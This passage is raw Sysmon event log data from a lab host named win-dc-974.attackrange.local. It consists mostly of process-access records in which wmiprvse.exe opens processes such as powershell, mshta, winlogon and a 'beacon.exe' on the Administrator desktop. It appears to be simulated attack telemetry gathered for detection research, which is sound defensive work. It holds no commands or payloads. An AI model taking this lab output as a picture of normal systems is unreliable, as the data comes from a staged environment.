indows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002243134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:43.498{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576\PSHost.132591776833455111.11576.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002243133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\Syste